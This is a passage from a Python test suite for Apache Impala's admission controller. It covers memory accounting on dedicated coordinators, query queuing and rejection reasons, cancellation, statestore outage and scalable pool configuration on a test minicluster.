self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml") + " -use_dedicated_coordinator_estimates false", num_exclusive_coordinators=1, cluster_size=2) def test_dedicated_coordinator_legacy_mem_accounting(self, vector): """Verify that when using dedicated coordinators with specialized dedicated coord estimates turned off using a hidden startup param, the memory admitted for and the mem limit applied to the query fragments running on the coordinator is the same (as expected from legacy behavior).""" self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1, cluster_size=2) def test_sanity_checks_dedicated_coordinator(self, vector, unique_database): """Sanity tests for verifying targeted dedicated coordinator memory estimations and behavior.""" self.client.set_configuration_option('request_pool', "root.regularPool") ImpalaTestSuite.change_database(self.client, vector.get_value('table_format')) exec_options = vector.get_value('exec_option') # Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated # coord estimates. Without this query option the estimate would be > 100MB. expected_mem = 60 * (1 << 20) # 60MB exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem self.client.set_configuration(exec_options) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) mem_to_admit = self.__get_mem_limits_admission_debug_page() assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\ "mem_to_admit:" + str(mem_to_admit) assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) self.client.close_query(handle) # If the query is only scheduled on the coordinator then the mem to admit on executor # should be zero. exec_options['NUM_NODES'] = 1 self.client.set_configuration(exec_options) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) mem_to_admit = self.__get_mem_limits_admission_debug_page() assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) assert abs(mem_to_admit['executor'] - 0) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) self.client.close_query(handle) # Make sure query execution works perfectly for a query that does not have any # fragments schdeuled on the coordinator, but has runtime-filters that need to be # aggregated at the coordinator. exec_options = vector.get_value('exec_option') exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000 query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database) result = self.execute_query_expect_success(self.client, query, exec_options) assert "Runtime filters: All filters arrived" in result.runtime_profile def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates): """Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies the actual vs expected values for mem admitted and mem limit for both coord and executor. Also verifies that those memory values are different if 'using_dedicated_coord_estimates' is true.""" self.client.set_configuration_option('request_pool', "root.regularPool") ImpalaTestSuite.change_database(self.client, vector.get_value('table_format')) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) expected_mem_limits = self.__get_mem_limits_admission_debug_page() actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id) mem_admitted = get_mem_admitted_backends_debug_page(self.cluster) debug_string = " expected_mem_limits:" + str( expected_mem_limits) + " actual_mem_limits:" + str( actual_mem_limits) + " mem_admitted:" + str(mem_admitted) MB = 1 << 20 # Easiest way to check float in-equality. assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[ 'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string # There may be some rounding errors so keep a margin of 5MB when verifying assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[ 'coordinator']) < 5 * MB, debug_string assert abs(actual_mem_limits['executor'] - expected_mem_limits[ 'executor']) < 5 * MB, debug_string assert abs(mem_admitted['coordinator'] - expected_mem_limits[ 'coordinator']) < 5 * MB, debug_string assert abs( mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \ debug_string def __get_mem_limits_admission_debug_page(self): """Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the mem_limit calculated by the admission controller from the impala admission debug page of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator' and 'executor' and their respective mem values in bytes.""" # Based on how the cluster is setup, the first impalad in the cluster is the # coordinator. response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission") assert 'resource_pools' in response_json assert len(response_json['resource_pools']) == 1 assert response_json['resource_pools'][0]['running_queries'] assert len(response_json['resource_pools'][0]['running_queries']) == 1 query_info = response_json['resource_pools'][0]['running_queries'][0] return {'coordinator': float(query_info["coord_mem_to_admit"]), 'executor': float(query_info["mem_limit"])} def __get_mem_limits_memz_debug_page(self, query_id): """Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the mem limits enforced on the query (identified by the 'query_id') extracted from mem-tracker's output on the memz debug page of the dedicated coordinator and the executor impala daemons. Returns a dictionary with the keys 'coordinator' and 'executor' and their respective mem values in bytes.""" metric_name = "Query({0})".format(query_id) # Based on how the cluster is setup, the first impalad in the cluster is the # coordinator. mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in self.cluster.impalads] return {'coordinator': float(mem_trackers[0]['limit']), 'executor': float(mem_trackers[1]['limit'])} @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1) def test_dedicated_coordinator_planner_estimates(self, vector, unique_database): """Planner tests to add coverage for coordinator estimates when using dedicated coordinators. Also includes coverage for verifying cluster memory admitted.""" vector_copy = copy(vector) exec_options = vector.get_value('exec_option') # Remove num_nodes from the options to allow test case runner to set it in one of # the test cases. del exec_options['num_nodes'] exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy, unique_database) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS), start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G", statestored_args=_STATESTORED_ARGS) def test_heterogeneous_proc_mem_limit(self, vector): """ Test to ensure that the admission controller takes into account the actual proc mem limits of each impalad. Starts a cluster where the last impalad has a smaller proc mem limit than other impalads and runs queries where admission/rejection decision depends on the coordinator knowing the other impalad's mem limits. The queue_wait_timeout_ms has been set to be more than the prioritized statestore update time, so that the queries don't time out before receiving updates to pool stats""" # Choose a query that runs on all 3 backends. query = "select * from functional.alltypesagg, (select 1) B limit 1" # Successfully run a query with mem limit equal to the lowest process memory among # impalads exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "2G" self.execute_query_expect_success(self.client, query, exec_options) # Test that a query scheduled to run on a single node and submitted to the impalad # with higher proc mem limit succeeds. exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "3G" exec_options['num_nodes'] = "1" self.execute_query_expect_success(self.client, query, exec_options) # Exercise rejection checks in admission controller. try: exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "3G" self.execute_query(query, exec_options) except ImpalaBeeswaxException as e: assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB" " is greater than memory available for admission 2.00 GB of \S+", str(e)), \ str(e) # Exercise queuing checks in admission controller. try: # Wait for previous queries to finish to avoid flakiness. for impalad in self.cluster.impalads: impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0) impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client() impalad_with_2g_mem.set_configuration_option('mem_limit', '1G') impalad_with_2g_mem.execute_async("select sleep(1000)") # Wait for statestore update to update the mem admitted in each node. sleep(STATESTORE_RPC_FREQUENCY_MS / 1000) exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "2G" # Since Queuing is synchronous and we can't close the previous query till this # returns, we wait for this to timeout instead. self.execute_query(query, exec_options) except ImpalaBeeswaxException as e: assert re.search("Queued reason: Not enough memory available on host \S+.Needed " "2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e) finally: if impalad_with_2g_mem is not None: impalad_with_2g_mem.close() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT), statestored_args=_STATESTORED_ARGS) def test_cancellation(self): """ Test to confirm that all Async cancellation windows are hit and are able to succesfully cancel the query""" impalad = self.cluster.impalads[0] client = impalad.service.create_beeswax_client() try: client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000") client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1) handle = client.execute_async("select 1") sleep(1) client.close_query(handle) self.assert_impalad_log_contains('INFO', "Ready to be Rejected but already cancelled, query id=") client.clear_configuration() client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000") handle = client.execute_async("select 2") sleep(1) client.close_query(handle) self.assert_impalad_log_contains('INFO', "Ready to be Admitted immediately but already cancelled, query id=") client.set_configuration_option("debug_action", "CRS_BEFORE_COORD_STARTS:SLEEP@2000") handle = client.execute_async("select 3") sleep(1) client.close_query(handle) self.assert_impalad_log_contains('INFO', "Cancelled right after starting the coordinator query id=") client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000") handle = client.execute_async("select 4") sleep(1) client.close_query(handle) self.assert_impalad_log_contains('INFO', "Cancelled right after starting the coordinator query id=", 2) client.clear_configuration() handle = client.execute_async("select sleep(10000)") client.set_configuration_option("debug_action", "AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000") queued_query_handle = client.execute_async("select 5") sleep(1) assert client.get_state(queued_query_handle) == QueryState.COMPILED assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle) # Only cancel the queued query, because close will wait till it unregisters, this # gives us a chance to close the running query and allow the dequeue thread to # dequeue the queue query client.cancel(queued_query_handle) client.close_query(handle) client.close_query(queued_query_handle) queued_profile = client.get_runtime_profile(queued_query_handle) assert "Admission result: Cancelled (queued)" in queued_profile self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=") client.clear_configuration() handle = client.execute_async("select sleep(10000)") queued_query_handle = client.execute_async("select 6") sleep(1) assert client.get_state(queued_query_handle) == QueryState.COMPILED assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle) client.close_query(queued_query_handle) client.close_query(handle) queued_profile = client.get_runtime_profile(queued_query_handle) assert "Admission result: Cancelled (queued)" in queued_profile for i in self.cluster.impalads: i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0) assert self.cluster.impalads[0].service.get_metric_value( "admission-controller.agg-num-running.default-pool") == 0 assert self.cluster.impalads[0].service.get_metric_value( "admission-controller.total-admitted.default-pool") == 4 assert self.cluster.impalads[0].service.get_metric_value( "admission-controller.total-queued.default-pool") == 2 finally: client.close() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_queue_reasons_num_queries(self): """Test that queue details appear in the profile when queued based on num_queries.""" # Run a bunch of queries - one should get admitted immediately, the rest should # be dequeued one-by-one. STMT = "select sleep(1000)" TIMEOUT_S = 60 EXPECTED_REASON = \ "Latest admission queue reason: number of running queries 1 is at or over limit 1" NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S) num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile]) assert num_reasons == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) init_queue_reasons = self.__extract_init_queue_reasons(profiles) assert len(init_queue_reasons) == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) over_limit_details = [detail for detail in init_queue_reasons if 'number of running queries' in detail] assert len(over_limit_details) == 1, \ "One query initially queued because of num_queries: " + '\n===\n'.join(profiles) queue_not_empty_details = [detail for detail in init_queue_reasons if 'queue is not empty' in detail] assert len(queue_not_empty_details) == NUM_QUERIES - 2, \ "Others queued because of non-empty queue: " + '\n===\n'.join(profiles) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10, pool_max_mem=10 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_queue_reasons_memory(self): """Test that queue details appear in the profile when queued based on memory.""" # Run a bunch of queries with mem_limit set so that only one can be admitted at a # time- one should get admitted immediately, the rest should be dequeued one-by-one. STMT = "select sleep(100)" TIMEOUT_S = 60 EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\ "available in pool default-pool with max mem resources 10.00 MB (configured " \ "statically). Needed 9.00 MB but only 1.00 MB was available." NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, {'mem_limit': '9mb'}) num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile]) assert num_reasons == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) init_queue_reasons = self.__extract_init_queue_reasons(profiles) assert len(init_queue_reasons) == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) over_limit_details = [detail for detail in init_queue_reasons if 'Not enough aggregate memory available' in detail] assert len(over_limit_details) == 1, \ "One query initially queued because of memory: " + '\n===\n'.join(profiles) queue_not_empty_details = [detail for detail in init_queue_reasons if 'queue is not empty' in detail] assert len(queue_not_empty_details) == NUM_QUERIES - 2, \ "Others queued because of non-empty queue: " + '\n===\n'.join(profiles) def __extract_init_queue_reasons(self, profiles): """Return a list of the 'Admission Queue details' strings found in 'profiles'""" matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles] return [match.group(0) for match in matches if match is not None] @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_query_locations_correctness(self, vector): """Regression test for IMPALA-7516: Test to make sure query locations and in-flight queries are correct for different admission results that can affect it.""" if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') # Choose a query that runs on all 3 backends. query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1" # Case 1: When a query runs succesfully. handle = self.client.execute_async(query) self.__assert_num_queries_accounted(1) self.close_query(handle) self.__assert_num_queries_accounted(0) # Case 2: When a query is queued then cancelled handle_running = self.client.execute_async(query) self.client.wait_for_admission_control(handle_running) handle_queued = self.client.execute_async(query) self.client.wait_for_admission_control(handle_queued) self.impalad_test_service.wait_for_metric_value( "admission-controller.total-queued.default-pool", 1) # Queued queries don't show up on backends self.__assert_num_queries_accounted(1, 1) # First close the queued query self.close_query(handle_queued) self.close_query(handle_running) self.__assert_num_queries_accounted(0) # Case 3: When a query gets rejected exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "1b" self.execute_query_expect_failure(self.client, query, exec_options) self.__assert_num_queries_accounted(0) def __assert_num_queries_accounted(self, num_running, num_queued=0): """Checks if the num of queries accounted by query_locations and in-flight are as expected""" # Wait for queries to start/un-register. num_inflight = num_running + num_queued assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight) query_locations = self.impalad_test_service.get_query_locations() for host, num_q in query_locations.items(): assert num_q == num_running, "There should be {0} running queries on either " \ "impalads: {0}".format(query_locations) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml", make_copy=True), statestored_args=_STATESTORED_ARGS) def test_pool_mem_limit_configs(self, vector): """Runs functional tests for the max/min_query_mem_limit pool config attributes""" exec_options = vector.get_value('exec_option') # Set this to the default. exec_options['exec_single_node_rows_threshold'] = 100 # Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and # per_cluster values used in the test. exec_options['num_nodes'] = 1 self.run_test_case('QueryTest/admission-max-min-mem-limits', vector) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml", additional_args="-default_pool_max_requests 1", make_copy=True), statestored_args=_STATESTORED_ARGS) def test_pool_config_change_while_queued(self, vector): """Tests that the invalid checks work even if the query is queued. Makes sure that a queued query is dequeued and rejected if the config is invalid.""" pool_name = "invalidTestPool" config_str = "max-query-mem-limit" self.client.set_configuration_option('request_pool', pool_name) # Setup to queue a query. sleep_query_handle = self.client.execute_async("select sleep(10000)") self.client.wait_for_admission_control(sleep_query_handle) self.__wait_for_change_to_profile(sleep_query_handle, "Admission result: Admitted immediately") queued_query_handle = self.client.execute_async("select 2") self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued") # Change config to be invalid. llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml") config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path) config.set_config_value(pool_name, config_str, 1) # Close running query so the queued one gets a chance. self.client.close_query(sleep_query_handle) # Observe that the queued query fails. self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20), self.close_query(queued_query_handle) # Change the config back to a valid value config.set_config_value(pool_name, config_str, 0) # Now do the same thing for change to pool.max-query-mem-limit such that it can no # longer accommodate the largest min_reservation. # Setup to queue a query. sleep_query_handle = self.client.execute_async("select sleep(10000)") self.client.wait_for_admission_control(sleep_query_handle) queued_query_handle = self.client.execute_async( "select * from functional_parquet.alltypes limit 1") self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued") # Change config to something less than the what is required to accommodate the # largest min_reservation (which in this case is 32.09 MB. config.set_config_value(pool_name, config_str, 25 * 1024 * 1024) # Close running query so the queued one gets a chance. self.client.close_query(sleep_query_handle) # Observe that the queued query fails. self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20), self.close_query(queued_query_handle) def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20): for _ in range(timeout * 10): profile = self.client.get_runtime_profile(query_handle) if search_string in profile: return sleep(0.1) assert False, "Timed out waiting for change to profile\nSearch " \ "String: {0}\nProfile:\n{1}".format(search_string, str(profile)) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024)) @needs_session() def test_queuing_status_through_query_log_and_exec_summary(self): """Test to verify that the HS2 client's GetLog() call and the ExecSummary expose the query's queuing status, that is, whether the query was queued and what was the latest queuing reason.""" # Start a long running query. long_query_resp = self.execute_statement("select sleep(10000)") # Ensure that the query has started executing. self.wait_for_admission_control(long_query_resp.operationHandle) # Submit another query. queued_query_resp = self.execute_statement("select 1") # Wait until the query is queued. self.wait_for_operation_state(queued_query_resp.operationHandle, TCLIService.TOperationState.PENDING_STATE) # Check whether the query log message correctly exposes the queuing status. get_log_req = TCLIService.TGetLogReq() get_log_req.operationHandle = queued_query_resp.operationHandle log = self.hs2_client.GetLog(get_log_req).log assert "Admission result : Queued" in log, log assert "Latest admission queue reason : number of running queries 1 is at or over " "limit 1" in log, log # Now check the same for ExecSummary. summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq() summary_req.operationHandle = queued_query_resp.operationHandle summary_req.sessionHandle = self.session_handle exec_summary_resp = self.hs2_client.GetExecSummary(summary_req) assert exec_summary_resp.summary.is_queued assert "number of running queries 1 is at or over limit 1" in \ exec_summary_resp.summary.queued_reason,\ exec_summary_resp.summary.queued_reason # Close the running query. self.close(long_query_resp.operationHandle) # Close the queued query. self.close(queued_query_resp.operationHandle) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3, pool_max_mem=1024 * 1024 * 1024) + " --admission_control_stale_topic_threshold_ms={0}".format( STALE_TOPIC_THRESHOLD_MS), statestored_args=_STATESTORED_ARGS) def test_statestore_outage(self): """Test behaviour with a failed statestore. Queries should continue to be admitted but we should generate diagnostics about the stale topic.""" self.cluster.statestored.kill() impalad = self.cluster.impalads[0] # Sleep until the update should be definitely stale. sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5) ac_json = impalad.service.get_debug_webpage_json('/admission') ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"] assert ms_since_update > STALE_TOPIC_THRESHOLD_MS assert ("Warning: admission control information from statestore is stale:" in ac_json["statestore_update_staleness_detail"]) # Submit a batch of queries. One should get to run, one will be rejected because # of the full queue, and the others will run after being queued. STMT = "select sleep(100)" TIMEOUT_S = 60 NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, allow_query_failure=True) ADMITTED_STALENESS_WARNING = \ "Warning: admission control information from statestore is stale" ADMITTED_STALENESS_PROFILE_ENTRY = \ "Admission control state staleness: " + ADMITTED_STALENESS_WARNING num_queued = 0 num_admitted_immediately = 0 num_rejected = 0 for profile in profiles: if "Admission result: Admitted immediately" in profile: assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile num_admitted_immediately += 1 elif "Admission result: Rejected" in profile: num_rejected += 1 # Check that the rejection error returned to the client contains a warning. query_statuses = [line for line in profile.split("\n") if "Query Status:" in line] assert len(query_statuses) == 1, profile assert ADMITTED_STALENESS_WARNING in query_statuses[0] else: assert "Admission result: Admitted (queued)" in profile, profile assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile # Check that the queued reason contains a warning. queued_reasons = [line for line in profile.split("\n") if "Initial admission queue reason:" in line] assert len(queued_reasons) == 1, profile assert ADMITTED_STALENESS_WARNING in queued_reasons[0] num_queued += 1 assert num_admitted_immediately == 1 assert num_queued == 3 assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), statestored_args=_STATESTORED_ARGS) def test_scalable_config(self, vector): """ Test that the scalable configuration parameters scale as the cluster size changes. """ # Start with 3 Impalads coordinator = self.cluster.impalads[0] impalad_1 = self.cluster.impalads[1] impalad_2 = self.cluster.impalads[2] self.__check_admission_by_counts(expected_num_impalads=3) # The mem_limit values that are passed to __check_admission_by_memory are based on # the memory used by the query when run on clusters of varying sizes, but mem_limit # is used in the test to make the test deterministic in the presence of changing # memory estimates. self.__check_admission_by_memory(True, '85M') # Kill an Impalad, now there are 2. impalad_1.kill_and_wait_for_exit() coordinator.service.wait_for_num_known_live_backends(2) self.__check_admission_by_counts(expected_num_impalads=2) self.__check_admission_by_memory(False, '125M', 'is greater than pool max mem resources 200.00 MB' ' (calculated as 2 backends each with 100.00 MB)') # Restart an Impalad, now there are 3 again. impalad_1.start(wait_until_ready=True) coordinator.service.wait_for_num_known_live_backends(3) self.__check_admission_by_counts(expected_num_impalads=3) self.__check_admission_by_memory(True, '85M') # Kill 2 Impalads, now there are 1. impalad_1.kill_and_wait_for_exit() impalad_2.kill_and_wait_for_exit() coordinator.service.wait_for_num_known_live_backends(1) self.__check_admission_by_counts(expected_num_impalads=1) self.__check_admission_by_memory(False, '135M', 'is greater than pool max mem resources 100.00 MB' ' (calculated as 1 backends each with 100.00 MB)') # Restart 2 Impalads, now there are 3 again. impalad_1.start(wait_until_ready=True) impalad_2.start(wait_until_ready=True) coordinator.service.wait_for_num_known_live_backends(3) self.__check_admission_by_counts(expected_num_impalads=3) self.__check_admission_by_memory(True, '85M') def __check_admission_by_memory(self, expected_admission, mem_limit, expected_rejection_reason=None): """ Test if a query can run against the current cluster. :param mem_limit set in the client configuration to limit query memory. :param expected_admission: True if admission is expected. :param expected_rejection_reason: a string expected to be in the reason for rejection. """ query = "select * from functional.alltypesagg order by int_col limit 1" profiles = self._execute_and_collect_profiles([query], timeout_s=60, allow_query_failure=True, config_options={'request_pool': 'root.queueE', 'mem_limit': mem_limit}) assert len(profiles) == 1 profile = profiles[0] if "Admission result: Admitted immediately" in profile: did_admit = True elif "Admission result: Rejected" in profile: did_admit = False num_rejected, rejected_reasons = self.parse_profiles_rejected(profiles) assert num_rejected == 1 assert expected_rejection_reason is not None, rejected_reasons[0] assert expected_rejection_reason in rejected_reasons[0], profile else: assert "Admission result: Admitted (queued)" in profile, profile assert 0, "should not queue based on memory" assert did_admit == expected_admission, profile def __check_admission_by_counts(self, expected_num_impalads): """ Run some queries, find how many were admitted, queued or rejected, and check that AdmissionController correctly enforces query count limits based in the configuration in llama-site-test2.xml. """ NUM_QUERIES = 6 # Set expected values based on expected_num_impalads. # We can run 1 query per backend for queueE from llama-site-test2.xml. expected_num_admitted = expected_num_impalads # The value of max-queued-queries-multiple for queueE from llama-site-test2.xml. QUERIES_MULTIPLE = 0.6 expected_num_queued = int(math.ceil(expected_num_impalads * QUERIES_MULTIPLE)) expected_num_rejected = NUM_QUERIES - (expected_num_admitted + expected_num_queued) impalad = self.cluster.impalads[0] client = impalad.service.create_beeswax_client() client.set_configuration({'request_pool': 'root.queueE'}) result = client.execute("select 1") # Query should execute in queueE. self.__check_query_options(result.runtime_profile, ['REQUEST_POOL=root.queueE']) STMT = "select sleep(1000)" TIMEOUT_S = 60 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, allow_query_failure=True, config_options={'request_pool': 'root.queueE'}) # Check admitted queries num_admitted_immediately = self.parse_profiles_admitted(profiles) assert num_admitted_immediately == expected_num_admitted # Check queued queries. num_queued, queued_reasons = self.parse_profiles_queued(profiles) assert num_queued == expected_num_queued assert len(queued_reasons) == num_queued expected_queue_reason = ( "number of running queries {0} is at or over limit {1}".format( expected_num_admitted, expected_num_admitted) ) # The first query to get queued sees expected_queue_reason. assert len([s for s in queued_reasons if expected_queue_reason in s]) == 1 # Subsequent queries that are queued see that the queue is not empty. expected_see_non_empty_queue = max(expected_num_queued - 1, 0) assert len([s for s in queued_reasons if "queue is not empty" in s]) == expected_see_non_empty_queue # Check rejected queries num_rejected, rejected_reasons = self.parse_profiles_rejected(profiles) assert num_rejected == expected_num_rejected expected_rejection_reason = ( "Rejected query from pool root.queueE: queue full, " "limit={0} (calculated as {1} backends each with 0.6 queries)".format( expected_num_queued, expected_num_impalads) ) assert len([s for s in rejected_reasons if expected_rejection_reason in s]) == expected_num_rejected def parse_profiles_queued(self, profiles): """ Parse a list of Profile strings and sum the counts of queries queued. :param profiles: a list of query profiles to parse. :return: The number queued. """ num_queued = 0 queued_reasons_return = [] for profile in profiles: if "Admission result: Admitted (queued)" in profile: queued_reasons = [line for line in profile.split("\n") if "Initial admission queue reason:" in line] assert len(queued_reasons) == 1, profile num_queued += 1 queued_reasons_return.append(queued_reasons[0]) return num_queued, queued_reasons_return def parse_profiles_admitted(self, profiles): """ Parse a list of Profile strings and sum the counts of queries admitted immediately. :param profiles: a list of query profiles to parse. :return: The number admitted immediately. """ num_admitted_immediately = 0 for profile in profiles: if "Admission result: Admitted immediately" in profile: num_admitted_immediately += 1 return num_admitted_immediately def parse_profiles_rejected(self, profiles): """ Parse a list of Profile strings and sum the counts of queries rejected. :param profiles: a list of query profiles to parse. :return: The number rejected. """ num_rejected = 0 rejected_reasons_return = [] for profile in profiles: if "Admission result: Rejected" in profile: num_rejected += 1 query_statuses = [line for line in profile.split("\n") if "Query Status:" in line] assert len(query_statuses) == 1, profile rejected_reasons_return.append(query_statuses[0]) return num_rejected, rejected_reasons_return @pytest.mark.execute_serially def test_impala_server_startup_delay(self): """This test verifies that queries get queued when the coordinator has already started accepting client connections during startup, but the local backend descriptor is not yet available.""" server_start_delay_s = 20 # We need to start the cluster here instead of during setup_method() so we can launch # it from a separate thread. def start_cluster(): LOG.info("Starting cluster") impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % ( 1000 * server_start_delay_s) self._start_impala_cluster(['--impalad_args=%s' % impalad_args]) # Initiate the cluster start start_cluster_thread = threading.Thread(target=start_cluster) start_cluster_thread.start() # Wait some time to arrive at IMPALA_SERVER_END_OF_START sleep(server_start_delay_s) # With a new client, execute a query and observe that it gets queued and ultimately # succeeds. client = self.create_impala_client() result = self.execute_query_expect_success(client, "select 1") start_cluster_thread.join() profile = result.runtime_profile reasons = self.__extract_init_queue_reasons([profile]) assert len(reasons) == 1 assert "Local backend has not started up yet." in reasons[0] @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1) def test_release_backends(self, vector): """Test that executor backends are shutdown when they complete, that completed executor backends release their admitted memory, and that NumCompletedBackends is updated each time an executor backend completes.""" if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') # Craft a query where part of the executor backends completes, while the rest remain # running indefinitely. The query forces the 'lineitem' table to be treated as the # small table even though it is bigger than the 'customer' table. This forces the # small table scan ('lineitem' scan) to run on two nodes and the big table scan # ('customers' scan) to run on a single node. By using debug actions to force the # big table scan to hang 